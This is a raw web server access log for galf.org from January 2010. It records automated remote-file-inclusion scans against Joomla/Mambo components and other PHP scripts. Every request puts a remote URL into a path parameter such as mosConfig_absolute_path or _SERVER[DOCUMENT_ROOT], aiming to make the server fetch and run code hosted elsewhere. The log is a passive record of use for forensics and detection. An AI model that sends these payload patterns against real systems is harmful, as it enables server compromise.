207.191.225.96 - - [11/Jan/2010:02:46:06 -0800] "GET /logs/access_091214.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:46:51 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:46:51 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:46:51 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:02:48:00 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:02:48:00 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:02:48:00 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:02:49:43 -0800] "GET /logs/access_100104.log%20%20//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:02:50:50 -0800] "GET /common/db.php?commonpath=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:02:50:50 -0800] "GET /logs//common/db.php?commonpath=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:02:50:50 -0800] "GET /logs/access.log%20%20//common/db.php?commonpath=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.55.15.194 - - [11/Jan/2010:02:51:32 -0800] "GET /logs/access.log///?_zb_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:02:51:49 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:02:51:49 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:53:37 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:53:38 -0800] "GET /logs/access_091102.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:02:54:02 -0800] "GET /common/db.php?commonpath=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:02:54:02 -0800] "GET /logs/access.log%20%20//common/db.php?commonpath=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [11/Jan/2010:02:54:02 -0800] "GET /logs//common/db.php?commonpath=http://www.qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:54:05 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:02:54:05 -0800] "GET /logs/access_091102.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:56:42 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:56:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
65.23.156.168 - - [11/Jan/2010:02:56:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
61.106.21.31 - - [11/Jan/2010:02:58:54 -0800] "GET /logs/access.log///?_SERVER%5BDOCUMENT_ROOT%5D=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.106.21.31 - - [11/Jan/2010:02:58:55 -0800] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://geo.metodist.ru/images/id? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
61.106.21.31 - - [11/Jan/2010:02:58:56 -0800] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://geo.metodist.ru/images/id? HTTP/1.1" 200 4805 "-" "libwww-perl/5.79" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:02:59:52 -0800] "GET /logs/access_091207.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:02:59:52 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:02:59:52 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:02:59:56 -0800] "GET /logs/access_091207.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:02:59:56 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:02:59:56 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:03:00:03 -0800] "GET /logs/access_091123.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [11/Jan/2010:03:00:11 -0800] "GET /logs/access_091123.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:01:45 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:01:45 -0800] "GET /logs/access_091102.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:01:46 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:14 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:14 -0800] "GET /logs/access_090817.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:14 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:19 -0800] "GET /logs/access_090817.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:19 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:19 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:23 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:23 -0800] "GET /logs/access_090817.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:23 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:27 -0800] "GET /logs/access_090720.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:30 -0800] "GET /logs/access_090720.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:03:33 -0800] "GET /logs/access_090720.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:38 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:39 -0800] "GET /logs/access_090907.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:39 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.26.58 - - [11/Jan/2010:03:03:51 -0800] "GET /logs/access_090921.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:03:56 -0800] "GET /logs/access_090817.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:03:56 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:03:56 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:04:00 -0800] "GET /logs/access_090720.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:04:04 -0800] "GET /logs/access_090907.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:04:04 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:04:04 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.234.122.76 - - [11/Jan/2010:03:04:04 -0800] "GET /logs/access_090921.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.olije.com/zbxe/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:04:07 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:04:48 -0800] "GET /logs/access_090907.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:04:48 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:04:48 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:04:56 -0800] "GET /logs/access_100104.log//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:05:08 -0800] "GET /logs/access_090907.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:05:08 -0800] "GET /logs/access_090921.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:05:08 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:05:08 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.12.13.152 - - [11/Jan/2010:03:05:14 -0800] "GET /logs/access_090921.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:07:20 -0800] "GET /logs/access_091116.log%20%20/administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:07:20 -0800] "GET /logs/administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:07:20 -0800] "GET /administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:08:31 -0800] "GET /administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:08:31 -0800] "GET /logs/access_090810.log/administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:08:31 -0800] "GET /logs/administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:08:43 -0800] "GET /administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:08:43 -0800] "GET /logs/administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:08:43 -0800] "GET /logs/access_090810.log/administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [11/Jan/2010:03:08:43 -0800] "GET /logs/access_091207.log/administrator/components/com_competitions/includes/competitions/add.php?mosConfig_admin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:08:55 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.144.170 - - [11/Jan/2010:03:08:55 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.144.170 - - [11/Jan/2010:03:08:55 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.175.5.130 - - [11/Jan/2010:03:09:21 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:09:21 -0800] "GET /logs/access_091102.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:09:21 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:09:50 -0800] "GET /logs/access_091102.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:09:50 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.175.5.130 - - [11/Jan/2010:03:09:50 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:03:11:29 -0800] "GET /logs/access_091123.log/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:03:11:29 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:03:11:29 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:03:11:37 -0800] "GET /logs/access_091123.log/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:03:11:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [11/Jan/2010:03:11:37 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:13:38 -0800] "GET /abbc/abbc.class.php?mosConfig_absolute_path=http://cep.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:13:38 -0800] "GET /logs/access.log%20%20//abbc/abbc.class.php?mosConfig_absolute_path=http://cep.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:13:38 -0800] "GET /logs//abbc/abbc.class.php?mosConfig_absolute_path=http://cep.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:14:53 -0800] "GET /logs/access_091221.log%20%20//abbc/abbc.class.php?mosConfig_absolute_path=http://cep.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:15:02 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.144.170 - - [11/Jan/2010:03:15:02 -0800] "GET /logs/access.log//classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.144.170 - - [11/Jan/2010:03:15:02 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.144.170 - - [11/Jan/2010:03:15:12 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:15:12 -0800] "GET /logs/access_100104.log//classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:15:12 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:17:55 -0800] "GET /logs/access.log//abbc/abbc.class.php?mosConfig_absolute_path=http://cep.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [11/Jan/2010:03:18:15 -0800] "GET /logs/access_091221.log//abbc/abbc.class.php?mosConfig_absolute_path=http://cep.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.120.144.170 - - [11/Jan/2010:03:18:30 -0800] "GET /logs/access.log%20%20//classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
174.120.144.170 - - [11/Jan/2010:03:18:40 -0800] "GET /logs/access_100104.log%20%20//classes/adodbt/sql.php?classes_dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.108.83.106 - - [11/Jan/2010:03:19:11 -0800] "GET /logs/access.log///?path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.108.83.106 - - [11/Jan/2010:03:19:11 -0800] "GET //?path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
61.108.83.106 - - [11/Jan/2010:03:19:11 -0800] "GET /logs///?path=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
